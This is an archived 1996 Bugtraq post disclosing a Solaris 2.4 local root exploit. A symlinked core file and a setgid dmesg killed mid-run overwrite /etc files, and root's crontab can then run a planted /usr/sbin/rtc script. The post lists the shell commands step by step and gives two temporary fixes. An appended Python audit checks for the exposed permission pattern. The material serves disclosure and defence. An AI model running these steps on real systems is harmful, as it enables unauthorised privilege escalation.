From proff  Sun Aug  4 17:15:33 1996
Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id RAA29562 for best-of-security; Sun, 4 Aug 1996 17:15:33 +1000
Received: from brimstone.netspace.org ([128.148.157.143]) by suburbia.net (8.7.4/Proff-950810) with ESMTP id RAA29357 for <proff@SUBURBIA.NET>; Sun, 4 Aug 1996 17:08:46 +1000
Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <23726-752>; Sun, 4 Aug 1996 03:08:15 -0500
Received: from netspace.org (netspace [128.148.157.6]) by netspace.org (8.7/8.6.12) with SMTP id DAA20181; Sun, 4 Aug 1996 03:03:37 -0400
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8b) with
          spool id 204945 for BUGTRAQ@NETSPACE.ORG; Sun, 4 Aug 1996 02:16:02
          +2000
Received: from underground.org (underground.org [206.170.116.50]) by
          netspace.org (8.7/8.6.12) with ESMTP id CAA17611 for
          <bugtraq@netspace.org>; Sun, 4 Aug 1996 02:15:46 -0400
Received: (from aleph1@localhost) by underground.org (8.7.1/8.7.1) id WAA23505;
          Sat, 3 Aug 1996 22:51:03 -0700
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Approved-By:  Aleph One <aleph1@UNDERGROUND.ORG>
Message-ID: <Pine.LNX.3.91.960803224059.23451B-100000@underground.org>
Date: 	Sat, 3 Aug 1996 22:50:48 -0700
Reply-To: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
Sender: proff
From: Aleph One <aleph1@underground.org>
Subject:      Exploiting Zolaris 2.4 ??  :)
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>

From: Jungseok Roh <beren@cosmos.kaist.ac.kr>


 I think this bug is widely spread in Korea, but not all over the world.
 The following contents are wholly from SeokChan Lee, one of the best alumni
 of the legendary security task force team K**.
 Also someone whom I look up to ..:)

 The problem is the core dump system of Zolaris 2.4.
 Let's look into the man page of core(4), and then concentrate on one
 phrase.

core(4)                   File Formats                    core(4)
NAME
     core - core image file
DESCRIPTION
     The operating system writes out a core image  of  a  process
     when  it  is  terminated due to the receipt of some signals.
     The core  image  is  called  core  and  is  written  in  the
     process's  working  directory  (provided  it  can be; normal
     access controls apply).  A process with an effective user ID
     different  from  the  real  user  ID will not produce a core
     image.

  NOTICE the last phrase !!

  A PROCESS with an effective user ID different from the real user ID will
  NOT produce a core image. That's very important in the security phase.
  If such a system is not SET, we can make a core file anywhere ....
  just by killing with a signal .. ( U know why I use the term KILL )..

  * Now just sightsee the file system..
    another INTERESTING thing in the file system detected.

[cosmos:beren] uname -a
SunOS cosmos 5.4 Generic_101945-32 sun4m sparc
[cosmos:beren] ls -ald /etc
   8 drwxrwxr-x  25 root     sys         3584  7 월  25 일   18:46 /etc/
[cosmos:beren] ls -ald /usr
   2 drwxrwxr-x  30 root     sys         1024  7 월   5 일   17:26 /usr/
[cosmos:beren] ls -ald /usr/sbin
  10 drwxrwxr-x   4 root     bin         4608  5 월  18 일   03:38 /usr/sbin/

  ****  It's GROUP WRITABLE !!  *****

  Most of u guys know what I am about to say ..
  Main idea is ..
  "Let's stab that file system in the back using the sword, SGIDed utils.. "
  then let's traverse the file system and then take the sword ..

[cosmos:beren] find /usr -perm -2000 \( -group sys -o -group bin \) -ls
  ...

  Its sword family is dmesg, netstat and all that.
  Then take "dmesg" as the sword.

[cosmos:beren] ls -al /usr/sbin/dmesg
  12 -r-xr-sr-x   1 bin      sys         5520 1994  Jul 15 /usr/sbin/dmesg*

  It's sys SGIDed.

[cosmos:beren] ln -s /etc/SOMETHING core
[cosmos:beren] stty ^\^\
[cosmos:beren] pwd
/tmp
[cosmos:beren] dmesg
/* then slightly after u type this command, kill it using stty ^\^\ ;
   there come the following results */
^C (Core dumped)
[cosmos:beren] ls /etc/SOMETHING
SOMETHING

In this way u can overwrite /etc/passwd or do any operation on them.
If u run sparc Zolaris 2.4, look at root's crontab file.
See it ..! Definitely it contains the next phrase ..

# The rtc command is run to adjust the real time clock if and when
1 2 * * * [ -x /usr/sbin/rtc ] && /usr/sbin/rtc -c > /dev/null 2>&1

rtc is used in zolaris x86.

So u can make /usr/sbin/rtc the exploitation script, and can do anything.

U can fix this problem.. "Two ways.."
but these two TEMPORARY FIXES have drawbacks of their own.

1. Just blow away the group-writable bit on each file system..
  ** but a problem occurs when a PATCH is needed..
   I don't know what problem would occur ..
   but the GURU Seokchan Lee notified me of that.

2. echo "set coredefault=0" >> /etc/system
  ** but it disables core dumps..
   might not be a good method if you develop something and wanna view core.

 I don't know whether Sun made a patch for this.
 It doesn't work on Zolaris 2.5 .. I tested it.

__

  Beren .. it the lost tales ....

 JungSeok Roh /  Junior in KAIST management Dep. / beren@cosmos.kaist.ac.kr
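Added example, not part of the original message and not code from the poster or from Sun: a small Python audit that models the condition the post relies on, system directories writable by a group that also owns setgid executables (the `find -perm -2000` plus `ls -ald` check above, expressed as one report), and a check for the `set coredefault=0` line the post's second temporary fix adds to /etc/system. The records in `SAMPLE` are constructed to mirror the listing in the post; the `/usr/bin` and `/usr/bin/netstat` entries are assumptions added as a contrasting case. `walk_filesystem` builds the same records from a live Unix system so the report can be run for real.

```python
import os
import stat
from collections import defaultdict
from typing import Dict, List, NamedTuple, Sequence, Tuple


class Entry(NamedTuple):
    path: str
    mode: int    # st_mode: file type bits plus permission/setgid bits
    group: str   # owning group name


# Constructed records transcribed from the listing in the post
# (drwxrwxr-x -> 0o775, -r-xr-sr-x -> setgid | 0o555). The /usr/bin and
# /usr/bin/netstat entries are assumptions added to show a negative case.
SAMPLE: List[Entry] = [
    Entry("/etc", stat.S_IFDIR | 0o775, "sys"),
    Entry("/usr", stat.S_IFDIR | 0o775, "sys"),
    Entry("/usr/sbin", stat.S_IFDIR | 0o775, "bin"),
    Entry("/usr/sbin/dmesg", stat.S_IFREG | stat.S_ISGID | 0o555, "sys"),
    Entry("/usr/bin", stat.S_IFDIR | 0o755, "bin"),
    Entry("/usr/bin/netstat", stat.S_IFREG | stat.S_ISGID | 0o555, "bin"),
]


def setgid_groups(entries: Sequence[Entry]) -> Dict[str, List[str]]:
    """Map each group name to the setgid executables it owns."""
    groups: Dict[str, List[str]] = defaultdict(list)
    for e in entries:
        if stat.S_ISREG(e.mode) and e.mode & stat.S_ISGID and e.mode & 0o111:
            groups[e.group].append(e.path)
    return dict(groups)


def group_writable_dirs(entries: Sequence[Entry]) -> List[Entry]:
    """Directories whose group permission bits include write."""
    return [e for e in entries if stat.S_ISDIR(e.mode) and e.mode & stat.S_IWGRP]


def find_exposures(entries: Sequence[Entry]) -> List[Tuple[str, str, List[str]]]:
    """(directory, group, setgid binaries) triples where a process running with
    that group's effective GID, e.g. one of those binaries dumping core, can
    create files in the directory. This is the combination the post describes."""
    sg = setgid_groups(entries)
    hits = []
    for d in group_writable_dirs(entries):
        if d.group in sg:
            hits.append((d.path, d.group, sorted(sg[d.group])))
    return sorted(hits)


def core_dumps_disabled(system_text: str) -> bool:
    """True if an uncommented 'set coredefault=0' line is present in the text of
    /etc/system (the post's second temporary fix). '*' starts a comment there."""
    for raw in system_text.splitlines():
        line = raw.split("*", 1)[0].replace(" ", "").replace("\t", "")
        if line == "setcoredefault=0":
            return True
    return False


def walk_filesystem(roots: Sequence[str] = ("/etc", "/usr")) -> List[Entry]:
    """Build Entry records from a live Unix system with lstat (symlinks are not
    followed); unreadable paths and unknown GIDs are skipped."""
    import grp  # Unix only
    entries: List[Entry] = []
    for root in roots:
        for dirpath, _dirnames, filenames in os.walk(root):
            for p in [dirpath] + [os.path.join(dirpath, f) for f in filenames]:
                try:
                    st = os.lstat(p)
                    gname = grp.getgrgid(st.st_gid).gr_name
                except (OSError, KeyError):
                    continue
                entries.append(Entry(p, st.st_mode, gname))
    return entries


if __name__ == "__main__":
    # Report on the constructed sample; swap in walk_filesystem() for a real host.
    for path, group, bins in find_exposures(SAMPLE):
        print(f"{path} is writable by group {group}; setgid binaries: {', '.join(bins)}")
```

On the sample, the report flags /etc and /usr (group sys, which owns the setgid dmesg) and /usr/sbin (group bin, which owns the constructed netstat); /usr/bin is not flagged because its mode has no group write bit. Removing the group write bit from those directories, as the post's first fix suggests, empties the report without touching the setgid binaries themselves.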

